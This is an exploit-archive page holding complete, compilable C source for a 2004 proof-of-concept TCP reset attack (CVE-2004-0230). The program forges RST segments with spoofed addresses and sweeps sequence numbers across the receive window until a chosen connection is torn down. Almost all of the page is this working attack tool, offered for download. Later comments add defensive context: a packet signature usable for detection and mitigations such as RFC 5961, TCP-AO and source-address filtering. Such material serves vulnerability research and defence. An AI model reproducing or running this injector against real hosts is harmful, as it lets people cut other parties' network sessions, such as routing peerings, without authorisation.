
tcp_reset.c

tcp_reset.c
Posted Apr 28, 2004
Authored by eazy

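Sample proof-of-concept exploit demonstrating the TCP reset vulnerability discovered by Paul A. Watson, in which a receiver accepts an RST segment whose sequence number falls anywhere inside its receive window.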

tags | exploit, tcp, proof of concept
advisories | CVE-2004-0230
MD5 | 2edd0e1dafca116fdae393cd4f64c383

tcp_reset.c

/*
* tcp_reset.c: Proof of concept exploit that demonstrates the vulnerability described
* by Paul A. Watson in his paper "Slipping In The Window: TCP Reset Attacks"
*
* You need libnet 1.1.x
*
* Compile:
* gcc tcp_reset.c -o tcp_reset -lnet
*
* By: eazy <eazy@ondaquadra.org>
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <libnet.h>

/*
 * usage: print the command-line synopsis to stderr and terminate.
 *
 * prog is the program name inserted into the synopsis line.
 * Does not return: the process exits with status -1.
 */
void
usage(char *prog)
{
    /* Synopsis line first; it is the only part that needs formatting. */
    fprintf(stderr,
            "Usage: %s -s <src ip> -d <dst ip> -p <src port> -q <dst port> [-n <seq>] [-w <window size>] [-t <timeout>]\n",
            prog);

    /* One line per option, emitted verbatim. */
    fputs("\t-s\tsource ip address\n"
          "\t-d\tdestination ip address\n"
          "\t-p\tsource port\n"
          "\t-q\tdestination port\n"
          "\t-n\tinitial sequence number (default random)\n"
          "\t-w\twindow size (default 1000)\n"
          "\t-t\tpacket timeout (default 10000 usec)\n",
          stderr);

    exit(-1);
}

/*
 * main: parse a TCP connection 4-tuple plus tuning options, then emit a series
 * of TCP segments with only the RST flag set, using the caller-supplied source
 * address and ports, advancing the sequence number by `win` after each packet.
 * This is the blind in-window reset described for CVE-2004-0230.
 *
 * Exit status: 0 after the loop completes, -1 on a usage error or any libnet
 * failure.
 *
 * Defender notes:
 *  - Every packet built below carries fixed header values: IP ID 666, TTL 64,
 *    advertised TCP window 31337, ack number 0 and RST as the only flag. On
 *    the unmodified PoC these constants, together with a run of RSTs for one
 *    4-tuple whose sequence numbers rise by a constant step, are usable as a
 *    detection signature.
 *  - A receiver implementing RFC 5961 accepts an RST only when its sequence
 *    number exactly matches the next expected value and answers other
 *    in-window RSTs with a challenge ACK, which defeats window-stepping.
 *  - Segment authentication on long-lived sessions (TCP MD5, RFC 2385, or
 *    TCP-AO, RFC 5925) and source-address validation at the network edge
 *    (BCP 38) reduce exposure to forged segments of this kind.
 */
int
main(int argc, char **argv)
{

/* win is the sequence-number step per packet; timeout is the inter-packet delay in usec. */
int c, build_ip, opt, win = 1000, timeout = 10000;
unsigned short src_port = 0, dst_port = 0;
unsigned long src_ip = 0, dst_ip = 0, seq = 0;
libnet_t *l;
libnet_ptag_t tcp, ip;
struct libnet_stats stat;
char errbuf[LIBNET_ERRBUF_SIZE];

memset(&stat, 0, sizeof(stat));

/* The libnet context is opened in raw IPv4 mode before option parsing because
 * libnet_name2addr4() below takes the handle.
 * NOTE(review): raw-socket injection normally requires elevated privileges. */
if ((l = libnet_init(LIBNET_RAW4, NULL, errbuf)) == NULL) {
fprintf(stderr, "Libnet_init error: %s\n", errbuf);
exit(-1);
}
/* NOTE(review): the atoi() results below are not range-checked. Ports are
 * narrowed into unsigned short, and win/timeout are used as given. */
while ((opt = getopt(argc, argv, "s:d:p:q:n:w:t:h")) != -1)
switch (opt) {
case 's':
/* LIBNET_DONT_RESOLVE: the argument is taken as an address, no name lookup. */
src_ip = libnet_name2addr4(l, optarg, LIBNET_DONT_RESOLVE);
break;
case 'd':
dst_ip = libnet_name2addr4(l, optarg, LIBNET_DONT_RESOLVE);
break;
case 'p':
src_port = atoi(optarg);
break;
case 'q':
dst_port = atoi(optarg);
break;
case 'n':
/* Base 0 lets strtoul accept decimal, octal (0...) and hex (0x...). */
seq = strtoul(optarg, NULL, 0);
break;
case 'w':
win = atoi(optarg);
break;
case 't':
timeout = atoi(optarg);
break;
case 'h':
case '?':
/* usage() exits, so control never falls out of this case. */
usage(argv[0]);
}

/* Stray non-option arguments are treated as a usage error. */
if (optind < argc)
usage(argv[0]);

/* All four tuple members are mandatory; a value of zero counts as missing. */
if (!src_ip || !dst_ip || !src_port || !dst_port)
usage(argv[0]);

/* seq == 0 means "-n not given" (an explicit -n 0 is indistinguishable), so a
 * pseudo-random 32-bit starting point is drawn instead. */
if (!seq) {
libnet_seed_prand(l);
seq = libnet_get_prand(LIBNET_PRu32);
}
/* One packet per iteration, seq advanced by win each time, stopping once seq
 * reaches 2^32 - win. build_ip marks that the IPv4 header still has to be built.
 * NOTE(review): win is not validated; a value of zero never advances seq. */
for (tcp = LIBNET_PTAG_INITIALIZER, build_ip = 1; seq < 4294967296 - win; seq += win) {

/* The tag returned by the previous call is passed back in, so after the first
 * iteration the same TCP header block is reused with a new sequence number
 * (presumably updated in place by libnet; confirm against the libnet docs). */
tcp = libnet_build_tcp(
src_port, /* source port */
dst_port, /* destination port */
seq, /* sequence number */
0, /* acknowledgement num */
TH_RST, /* control flags */
31337, /* window size */
0, /* checksum */
0, /* urgent pointer */
LIBNET_TCP_H, /* TCP packet size */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
tcp); /* libnet id */

if (tcp == -1) {
fprintf(stderr, "Libnet_build_tcp error: %s\n", libnet_geterror(l));
goto bad;
}
/* The IPv4 header is identical for every packet, so it is built only once. */
if (build_ip) {
build_ip = 0;
ip = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_TCP_H, /* length */
0, /* TOS */
666, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */

if (ip == -1) {
fprintf(stderr, "Libnet_build_ipv4 error: %s\n", libnet_geterror(l));
goto bad;
}
}
/* c receives the write result but is only compared against -1 here. */
if ((c = libnet_write(l)) == -1) {
fprintf(stderr, "Libnet_write error: %s\n", libnet_geterror(l));
goto bad;
}
/* Pace the packets: wait `timeout` microseconds before the next one. */
usleep(timeout);
}

/* Normal completion: report libnet's counters and release the context.
 * NOTE(review): %d assumes the struct libnet_stats fields are int-sized;
 * verify against the libnet version in use. */
libnet_stats(l, &stat);
fprintf(stderr, "Packets sent: %d (%d bytes)\n"
"Packet errors: %d\n",
stat.packets_sent, stat.bytes_written, stat.packet_errors);
libnet_destroy(l);
exit(0);

/* Shared failure path: release the libnet context and exit non-zero. */
bad:
libnet_destroy(l);
exit(-1);
}
